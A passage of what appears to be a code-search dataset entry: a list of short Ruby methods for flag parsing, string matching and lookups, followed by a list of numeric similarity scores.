"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flag_for(tag)\n return @flags.detect { |flag| flag.tag == tag}\n end",
"def match(string)\n result = @trie[string]\n return nil unless result\n result.each do |pattern, block|\n match = pattern.match(string)\n block.call(match) if match\n end\n end",
"def find_me(arg)\n if @names[arg]\n return [true,nil]\n end\n @names.keys.each() do |name|\n if name =~ /^-(\\w)$/\n match_string = \"^\\\\-(\\\\w*)#{$1}(\\\\w*)$\"\n match_data = arg.match(match_string)\n if match_data\n # Note that if [1] and [2] were both empty \n # we'd have returned above\n return [true, \"-\" + match_data[1] + match_data[2]]\n end\n end\n end\n [false]\n end",
"def search_in(label, string)\n if !LABELS.include? label.to_sym\n raise ArgumentError, \"Unknown key: #{label}\"\n end\n\n find_all do |entry|\n text = entry.send(label).str\n text.match(/#{string}/i)\n end\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def find_param_for_flag(flag)\n params_with(:flag).each do |param_name, param_flag|\n return param_name if flag.to_s == param_flag.to_s\n end\n nil\n end",
"def find_entry!(string)\n string = string.upcase\n [ string, words.get(string) ] if words.has_key?(string)\n end",
"def find_by_value_str(value_str)\n value_str = value_str.to_s\n by_value_str[value_str]\n end",
"def found_match(str)\n\tif dictionary.include?(str) # returns true if found in the dictionary\n\t\treturn str # don't stop the recursion, but return the word ?\n\tend\n\tfalse\nend",
"def get_flag(color)\n @map.flags.find{ |f| f.color == color }\n end",
"def get(string)\n @strings[string]\n end",
"def find_by_value_str(value_str)\n value_str = value_str.to_s\n by_value.each do |value, instance|\n return instance if value_str == value.to_s\n end\n nil\n end",
"def find(string)\n string = string.split(//).join(\".*?\")\n pattern = \"/#{string}/i\"\n\n results = self.cache.grep /#{string}/i\n\n return results\n end",
"def test_stringflag_as_string\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz abcd)\n assert_equal true, opts[:xyz_given]\n assert_equal \"abcd\", opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz abcd --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal \"abcd\", opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def op_type(str)\n str\n match_id, match_filter_map = str.match(IDENTITY_REGEX2), str.match(FILTER_MAP_REGEX2)\n if FILTER_REGEX2 === str\n if match_filter_map[:mappable] == \" \" || match_filter_map[:mappable] == match_filter_map[:parameter]\n return :filter\n end\n # p match_filter_map\n if match_filter_map[:filterable] == match_filter_map[:parameter] || match_filter_map[:filterable] == \" \"\n if match_filter_map[:mappable].strip == match_filter_map[:parameter].strip\n return :identity\n else\n # somtehing here\n return :map\n end\n # elsif match_filter_map[:mappable] == match_filter_map[:parameter] || match_filter_map[:mappable] == \" \"\n\n end\n return :filter_map\n elsif MAP_REGEX2 === str\n if match_id[:identity].strip == match_id[:parameter].strip || match_id[:identity] == ' '\n return :identity\n else\n # map_match = str.match(M_REGEX)\n # p map_match[:mappable]\n # p 'hi'\n\n :map\n end\n end\nend",
"def get_keyword_value(string)\n return_string = String.new()\n found = false\n @keywordPairs.each do |pair|\n if pair[0] == string\n found = true\n return_string = pair[1]\n end\n end\n if found == false\n raise \"Error: In the command #{@utype}:#{@command_name} Attempted to get a Keyword pair #{string} present in the command\\n Is this keyword missing? \\n#{output}\"\n end\n return return_string\n end",
"def match_string t, d, context_d = d\n code, hash, t_text = unpack t\n puts \" match_string #{[code, hash, t_text, d, context_d]}\"\n eval_code code, (hash ? context_d : d)\n string_comparer t_text, d if t_text != nil\n hash\n end",
"def match_and_parse(string)\n meme = match(string)\n if meme.nil?\n return meme\n end\n bits = parse(meme, string)\n [meme, bits]\n end",
"def flag_state(flag_name)\n find_flag(flag_name).try(:state)\n end",
"def [](string)\n return nil unless cache_on?\n\n @mutex.synchronize { @cache[string] }\n end",
"def loc(string, opts = {})\n string = string.nil? ? '' : string.to_s\n opts[:language] ||= language\n opts[:platform] ||= platform\n bundle.strings_hash(opts)[string] || string\n end",
"def option(flag)\n options.find do |o|\n o.flags.any? { |f| clean_key(f) == clean_key(flag) }\n end\n end",
"def[](str)\n user_data[str.to_sym]\n end",
"def find_by_generic(name, type = nil)\n if name.nil?\n return nil\n elsif not name.is_a? String\n name = name.to_s\n end\n\n name = name.downcase\n @ghash.dup.each_value do |o|\n if type.nil?\n if o.generic.downcase == name or o.name.downcase == name or o.alt_names.find {|n| n.downcase == name }\n return o\n end\n else\n if o.is_a? type and (o.generic.downcase == name or o.name.downcase == name or o.alt_names.find {|n| n.downcase == name })\n return o\n end\n end\n end\n\n return nil\n end",
"def [](string)\n get(Risp::Symbol.intern(string))\n end",
"def match(str)\n d, m = str.split(\" \")\n _match(d, m) \n end",
"def unique_string(string)\n object = {}\n string.each_with_index do |el, i|\n if object[el]\n return false\n else\n object[el] = i\n end\n end\n true\nend",
"def lookup_name(arg)\n all_by_name[arg]\n end",
"def get_flag_option(flag_name)\n feature_flag_options.find_by(name: flag_name, feature_flaggable_type: self.class.name, feature_flaggable_id: id)\n end",
"def lookup(name)\n locations.find do |v|\n v.name.casecmp(name).zero? || (v.code == name)\n end\n end",
"def matches(smarts_or_string, uniq=true)\n each_match(smarts_or_string, uniq).map.to_a\n end",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def match?(value)\n if regex?\n return true if name =~ value.to_s\n else\n return(name == convert(value) ? true : @aliases.include?(convert(value)))\n end\n end",
"def flag_as(flag)\n raise ArgumentError if flag.class != String\n @flag = flag\n end",
"def matching_rule(string, relations)\n relations.each_with_index { |val, i| return i if val[0..2] == string }\n nil\n end",
"def active(str)\n # Maybe have a NullRuleSet\n @rule_heirarchy.find { |rule_set| rule_set.has?(str) }\n end",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n return -1\n end",
"def is_flag_attribute(word)\n define_method(word.to_sym) do |*args, &block|\n @result.__send__(\"#{word}=\".to_sym, true)\n end\n end",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n\n return -1\n end",
"def find_by_name(arrHash,strang)\nret = nil\n\tarrHash.each_with_index do |chack,index|\n\t\tif chack[:name]==strang\n\t\t\tret=chack\n\t\t\tbreak\n\t\tend\n\tend\n\tret\nend",
"def match?(name); end",
"def match(keyword); end",
"def matching_opts(arg, list, i)\n\t\t# Returns field of all exactly or abbreviated matching options.\n\t\tm = @option.values.select { |o| o.match?(arg, list, i) == :exact }\n\t\tif m.empty?\n\t\t\t@option.values.select { |o| o.match?(arg, list, i) == :abbrev }\n\t\telse\n\t\t\tm\n\t\tend \n\tend",
"def taxamatch(str1, str2, return_boolean = true)\n preparsed_1 = @parser.parse(str1)\n preparsed_2 = @parser.parse(str2)\n match = taxamatch_preparsed(preparsed_1, preparsed_2) rescue nil\n return_boolean ? (!!match && match['match']) : match\n end",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def match_in_string?(string, regex)\n string.match(regex).class == MatchData\nend",
"def at(search_string)\n self.search(search_string).first\n end",
"def extract_value(string, idx)\n if string.include?('=')\n string.split('=')[1]\n elsif @array.size == idx\n 'true'\n elsif @array[idx].start_with?('--')\n 'true'\n else\n @array[idx]\n end\n end",
"def get_match(match)\n fetch(\"match/#{match}\")\n end",
"def find(str)\n found_hash = {} #start with an empty hash\n if str.is_a? String\n @hash.each do |key,value|\n if key[0...str.length] == str #key[0...str.length] equates to characters from length 0 to str.length\n found_hash[key] = value #create new hash if statement is true\n end\n end\n return found_hash\n end\n end",
"def has_battle_command_by_string(name)\n @battle_commands.each_with_index do |command, index|\n if (command.name.casecmp(name) == 0)\n return index\n end\n end\n return -1\n end",
"def find(arr, str)\n\tarr.each { |item| \n\t\tif item == str\n\t\t\tp \"#{str} is in the zombie_apocalypse_supplies!\"\n\t\tend\n\t}\nend",
"def exact_match(user_word)\n @loader.arr.each do |word|\n return word if word == user_word\n end\n end",
"def case_insensitive_match=(_arg0); end",
"def match?(str)\n query = query_obj(str)\n tag_query = query[:tag]\n class_query = query[:classes]\n prop_query = query[:properties]\n\n (tag_query.blank? || match_tag?( tag_query )) &&\n (class_query.blank? || match_class?( class_query )) &&\n (prop_query.blank? || match_prop?( prop_query ))\n end",
"def match? string\n match = false\n patterns.each{|p|\n p string, p, \"===\"\n if string =~ Regexp.new(p.content)\n match = true\n break\n end\n }\n return match\n end",
"def which_matches(sel, dev)\n # regex match :)\n sel.each { |str|\n return str if dev[:name] =~ /^#{str}$/\n }\n return nil\nend",
"def find_by_name(name)\n matching = country_codes.select do |k, v|\n [*v].include? name\n end || {}\n\n # ruby 1.8\n returner = ItuCodes::Helpers.keys_from_hash(matching)\n\n if returner.size <= 1\n returner.first\n else\n returner\n end\n end",
"def flag_for(element, option = :flag)\n flag = nil\n flag_selector = element.options[option]\n unless flag_selector.nil?\n flag = @options[:flags][flag_selector] if @options[:flags].include?(flag_selector)\n end\n return flag\n end",
"def matches(str)\n each_match(str).to_a\n end",
"def match_a_string(name)\n case name\n in \"ruby\"\n puts \"https://www.ruby-lang.org/en/\"\n in \"python\"\n puts \"https://www.python.org/\"\n in \"elixir\"\n puts \"https://elixir-lang.org/\"\n else\n puts \"no match\"\n end\nend",
"def find_by_abbreviation!(abbreviation)\n all_cached.detect { |ct| ct.abbreviation == abbreviation } || super\n end",
"def lookup(string)\r\n return 2 ** (string.chr.downcase.ord - ('a'.ord))\r\n end",
"def food_group(str)\n food_groups = {\n \"grain\" => ['Rice', 'Trigo', 'Avena', 'Barley', 'Flour'],\n \"vegetable\" => ['Carrot', 'corn' 'Corn', 'Pumpkin', 'Papa'],\n \"fruit\" => ['Apple', 'Mango', 'Strawberry', 'Peaches', 'Pineapple'],\n \"meat\" => ['Beef', 'Chicken', 'Salmon', 'Fish', 'Pig'],\n \"dairy\" => ['Milk', 'Yogurt', 'Cheese', 'Cream']\n }\n\n food_groups.each do |k,array|\n array.each { |food| return k if food == str }\n end\n\n return 'food not found'\nend",
"def find_state(state_name)\n @states.find { |state| state.name.to_s == state_name.to_s }\n # TODO: use a data structure that prevents duplicates\n end",
"def opt_unique?(str)\n\texists = {}\n\tfor i in 0..str.length-1\n\t\tif exists[str[i]]\n\t\t\treturn false\n\t\telse\n\t\t\texists[str[i]] = true\n\t\tend\n\tend\n\ttrue\nend",
"def flag_hash\n flags.to_s.split(\", \").each_with_object({}) do |flag, hash|\n k, v = flag.split(\"=\")\n hash[k] = v\n end\n end",
"def match(str)\n return ['Result not found', 0] if @head.nil?\n holder = @head\n counter = 1\n while holder\n return [holder.data[1], counter] if holder.data[0] == str\n holder = holder.next\n counter += 1\n end\n ['Result not found', counter]\n end",
"def match(str=nil)\n return DelayedMatchConstructor.new unless str\n \n return Atoms::Re.new(str)\n end",
"def match(name)\n query(FindByString: name)\n end",
"def find_pattern(arr, string)\n element = arr.select { |name| name.include? string }\n arr.rindex(element[0])\nend",
"def find_trackable(trackable_str, trackable_id)\n trackable_str.constantize.find(trackable_id)\n end",
"def method_missing(name, *args)\n if name =~ /^is_(\\w+)\\?$/\n return state == $1.upcase\n end\n super\n end",
"def stat_long(string)\n if string == \"vit\"\n return \"Vitality\"\n elsif string == \"int\"\n return \"Intelligence\"\n elsif string == \"agi\"\n return \"Agility\"\n elsif string == \"str\"\n return \"Strength\"\n else\n return \"String given is not a Stat!\"\n end\n end",
"def fetch(flag)\n o = option(flag)\n if o.nil?\n cleaned_key = clean_key(flag)\n raise UnknownOption.new(\"option not found: '#{cleaned_key}'\", \"#{cleaned_key}\")\n else\n o.value\n end\n end",
"def get_make_var flag\n m = match Regexp.new(\"^#{flag}[ \\\\t]*=[ \\\\t]*(.*)$\")\n return m[1] if m\n return nil\n end",
"def get_make_var flag\n m = match Regexp.new(\"^#{flag}[ \\\\t]*=[ \\\\t]*(.*)$\")\n return m[1] if m\n return nil\n end",
"def flagged?(symbol)\n @flags.member?(symbol)\n end",
"def feature_flag_as_hash(flag_name)\n if FeatureFlag.where(name: flag_name).exists?\n {\n flag_name.to_s => feature_flag_for(flag_name)\n }.with_indifferent_access\n end\n end",
"def comp(str)\n @@COMP_TABLE[str]\n end",
"def first_matching(key)\n @attributes.find do |a|\n a[0].downcase == key.downcase\n end\n end",
"def methodChecksIfStringUnique(parameter_string) \n\thash_to_return = {}\n\n\tparameter_string.each_char do |char|\n\t\thash_to_return[char].nil? ? hash_to_return[char] = true : (return false)\n\tend\n\n\ttrue\n\t\nend",
"def string_matches_pattern(pattern, string)\n case pattern\n when Regexp\n pattern === node['string']\n when String\n string.include?(pattern)\n end\nend",
"def matchingStrings(strings, queries)\n counting_hash = {}\n counting_hash.default = 0\n\n # For Cache\n strings.each do |s|\n counting_hash[s] ? counting_hash[s] += 1 : counting_hash[s] = 1\n end\n\n res = []\n queries.each do |q|\n res << counting_hash[q]\n end\n res\nend",
"def get_flags( remove = nil )\n\n\t\t# escape dashes for split\n\t\t@value.gsub!(/\\\\\\-/, \"<dash>\")\n\n\t\t# Remove command, split by spaces\n\t\tif remove.nil?\n\t\t\tvars = @value.split(/\\s-/)\n\t\telse\n\t\t\tvars = @value.gsub( remove, '' ).split(/\\s-/)\n\t\tend\n\n\t\t# Hash to return\n\t\tflags = Hash.new\n\t\t# for each pair of arguments, place in Hash\n\t\t# \tflags[ flag ] = argument\n\t\tvars.each do |str|\n\t\t\n\t\t\t# Extract key and value\n\t\t\tkey = str[/^\\S+/]\n\t\t\tvalue = str.sub(/^\\S+ /, '' ).gsub(\"<dash>\", '-')\n\n\t\t\t# parse true/false values\n\t\t\tvalue = true if value.downcase == 'yes' or value.downcase == 'true'\n\t\t\tvalue = false if value.downcase == 'no' or value.downcase == 'false'\n\n\t\t\tvalue.chop! if value[-1] =~ /\\s/\n\t\t\tvalue = nil if value == ''\n\n\t\t\tflags[ key.to_sym ] = value unless key.nil?\n\t\t\t\n\t\tend\t\t\n\n\t\t# Return result\n\t\tflags\n\n\tend",
"def match_string( tree, string )\n # puts \"Checking for `#{string}` in tree (#{tree}).\"\n\n if tree.empty?\n # puts \"Tree is empty, returning empty\"\n return [ ]\n\n elsif string.empty?\n # puts \"No search string, returning empty\"\n return [ ]\n\n else\n matches = [ ]\n\n tree.each do |key,val|\n # puts \"Checking for `#{string}` in `#{key}` branch.\"\n\n simdex = string.simdex(key)\n\n if 0 < simdex\n if string == key\n # puts \"Matched full word! #{string} is #{key}\"\n # matches = collect_keys(val, key).unshift(key)\n return collect_keys(val, key).unshift(key)\n # puts \"Got matches: #{matches}\"\n\n else\n leaf = string.leaf(simdex)\n # puts \"Got leaf #{leaf}\"\n\n check = match_string(val, leaf)\n # puts \"Got check: #{check}\"\n\n if !check.empty?\n # matches = (check.map { |m| key + m })\n return check.map { |m| key + m }\n # puts \"New matches: #{matches}\"\n end\n end\n\n # break\n\n else\n check = match_string(val, string)\n\n if !check.empty?\n matches += check\n end\n end\n end\n\n # if matches.empty?\n # # puts \"No matches (#{string})\"\n # else\n # # puts \"Returning matches (#{string}): #{matches}\"\n # end\n\n return matches\n end\n end"
] | [
"0.63491124",
"0.5969406",
"0.5878499",
"0.5723808",
"0.57181597",
"0.5655273",
"0.5599379",
"0.54669285",
"0.5410632",
"0.5387644",
"0.5373354",
"0.5289001",
"0.5254369",
"0.5249525",
"0.5230608",
"0.5222844",
"0.5198079",
"0.51768315",
"0.5154593",
"0.51312244",
"0.51157",
"0.51079416",
"0.5029215",
"0.5023849",
"0.5023592",
"0.4962709",
"0.48834407",
"0.48630768",
"0.4861454",
"0.4860669",
"0.48562056",
"0.48496473",
"0.48222655",
"0.48213294",
"0.48164263",
"0.48164263",
"0.48161775",
"0.4796756",
"0.4795522",
"0.4793594",
"0.47835678",
"0.4770982",
"0.47567946",
"0.47479025",
"0.4740413",
"0.47332704",
"0.47288442",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4712268",
"0.4696649",
"0.46940514",
"0.46922913",
"0.46906778",
"0.46891686",
"0.46863633",
"0.46848053",
"0.46785545",
"0.46739116",
"0.46712738",
"0.46553233",
"0.46535403",
"0.4651236",
"0.46437588",
"0.46418813",
"0.4637851",
"0.46261486",
"0.46107626",
"0.4604026",
"0.45978183",
"0.45970136",
"0.4594401",
"0.4576958",
"0.45760328",
"0.45731938",
"0.45695376",
"0.4565921",
"0.45650166",
"0.45534173",
"0.4552288",
"0.4552288",
"0.4548248",
"0.45476237",
"0.45472705",
"0.45326036",
"0.45292526",
"0.45274302",
"0.45228043",
"0.4521084",
"0.45146126"
] | 0.61936486 | 1 |
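The `resolve(str)` record above matches a string against each syntax's positive and negative forms, either exactly or as a prefix, and accumulates the outcome in a Resolution object. A reduced sketch over plain strings, with the Resolution bookkeeping collapsed into a hash — the hash keys here are illustrative, not the original API:

# Resolve a flag string against candidate flags: exact match wins;
# otherwise a prefix match is unique only if exactly one candidate starts
# with the given string.
def resolve(str, candidates)
  exact = candidates.select { |c| c == str }
  return { match: exact.first, unique: true, exact: true } unless exact.empty?

  prefix = candidates.select { |c| c.start_with?(str) }
  { match: prefix.first, unique: prefix.size == 1, exact: false }
end

candidates = ['--verbose', '--version', '--no-verbose']
p resolve('--verbose', candidates) # => {:match=>"--verbose", :unique=>true, :exact=>true}
p resolve('--vers', candidates)    # => {:match=>"--version", :unique=>true, :exact=>false}
p resolve('--ver', candidates)     # ambiguous: {:match=>"--verbose", :unique=>false, :exact=>false}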
A list of canonical flag syntax strings. | def canonical_syntax_strings
@canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flag\n flags.join(\", \")\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags\n [long, short].compact\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def to_s\n @flags.join(', ')\n end",
"def xlate_flags()\n flags = []\n flags.push('Single Connection') if (flag_single_connection?)\n flags.push('Unencrypted') if (flag_unencrypted?)\n return(flags.join(', ')) if (flags.length != 0)\n return(\"None\")\n end",
"def flags(flags)\n f = \"\"\n if (flags & Sigar::RTF_UP) != 0\n f += \"U\"\n end\n if (flags & Sigar::RTF_GATEWAY) != 0\n f += \"G\"\n end\n if (flags & Sigar::RTF_HOST) != 0\n f += \"H\"\n end\n f\n end",
"def form_flagstring(f, fall)\n\t\tflagSelectAll = (!fall.nil? && fall.to_s.downcase == \"all\")\n\t\tif(flagSelectAll || f.nil? || f.empty?)\n\t\t\tflagStr = \"all\"\n\t\telse\n\t\t\tflagStr = f.join(\"|\")\n\t\tend\n\n\t\treturn flagStr\n\tend",
"def names\n @opt_types.keys.map {|e| undasherize e }\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def symbols\n @flags.keys\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def join(seperator = \" | \")\n\t\tflags.map { |flag| flag.name }.join(seperator)\n\tend",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def get_flags(*files)\n matches = []\n begin\n files.each do |f|\n file = File.new(f, 'r')\n while (line = file.gets)\n m = line.match(/(^.*=)?/)\n matches << m[0] if m\n end\n file.close\n end\n rescue => err\n puts 'Exception: #{err}'\n err\n end\n matches.uniq.sort!\nend",
"def literals_list\n @literals ||= \"\"\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def strings\n [\n build_identification_string,\n build_flags_string,\n build_info_string,\n build_name_string\n ].compact\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def options # :nodoc:\n [].tap do |o|\n o << \"Lazy\" if lazy?\n o << \"Reverse\" if reverse?\n o << \"Exclude [#{all_excluded_words.join(\", \")}]\" if excluded_words.any?\n o << \"No Options\" if o.empty?\n end\n end",
"def valid_options\n %i(\n\n ) # end array\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def thor_options_to_optparse\n flags = []\n %i[color progress debug interactive].each do |option|\n if options[option] then flags << \"--#{option}\"\n else flags << \"--no-#{option}\"\n end\n end\n flags\n end",
"def make_list(options)\n list = []\n to_switches(options).split(\" \").each do |a|\n list << a.gsub('\"', \"\")\n end\n list\n end",
"def default_flags\n cflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n cflags.push '-m64'\n end\n\n cflags\n end",
"def flagging\n @title = 'Flags and their meaning'\n @css = 'flags.css'\n end",
"def format_flag(flag)\n if flag.length == 1\n \" -#{flag}\"\n else\n \" --#{flag.to_s.tr('_', '-')}\"\n end\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def valid_options\n self::OPTIONS.map(&:to_s).join(', ')\n end",
"def option_names\n standard_option_names\nend",
"def parse_flags(msg)\n msg.scan(/-(\\w+)\\s*([^-]+)?/)\n .uniq{ |e| e[0] }\n .map{ |k, v| [k, v.nil? ? nil : v.squish] }\n .to_h\n .symbolize_keys\nend",
"def normalize_package_conf_content(name, flags = nil)\n [ name, normalize_flags(flags) ].join(' ')\n end",
"def resolve_flag(str)\n result = Flag::Resolution.new(str)\n flags.each do |flag_def|\n result.merge!(flag_def.resolve(str))\n end\n result\n end",
"def syntax\n t = @cmd_args\n t = [[t]] if !t.is_a? Array\n\n args = [] \n count = 0\n t.each do |expected_array|\n count += 1\n if count == 1\n str = \"Syntax: #{@cmd_name}\"\n else\n str = \" #{@cmd_name}\"\n end\n expected_array.each do |expected|\n # each expected arg.\n str += case expected\n when :arg_none then \"\"\n when :arg_dir! then \" <direction>\"\n when :arg_str! then \" <string literal>\"\n when :arg_word!then \" <word>\"\n when :arg_int! then \" <#>\"\n when :arg_obj_inv! then \" <item>\"\n when :arg_obj_room! then \" <item>\"\n when :arg_obj_inv_or_room! then \" <item>\"\n when :arg_class! then \" <Class>\"\n when :arg_player_in_game! then \" <player in game>\"\n when :arg_player_offline! then \" <any player>\"\n when :arg_actor_room! then \" <npc/player>\"\n when String then \" \" + expected \n else \"\"\n \n end\n end \n args << str\n end\n return args\n end",
"def to_s\n\t\tmap { |k,v|\n\t\t\tv.to_s + \" ::= \" + v.rules.map { |r| r.map{|e| e.inspect}.join(\" \") }.join(\" | \")\n\t\t}.join(\"\\n\")\n\tend",
"def for_option_parser\n [short, long, return_type, description].flatten.reject{ |o| o.to_s.empty? }\n end",
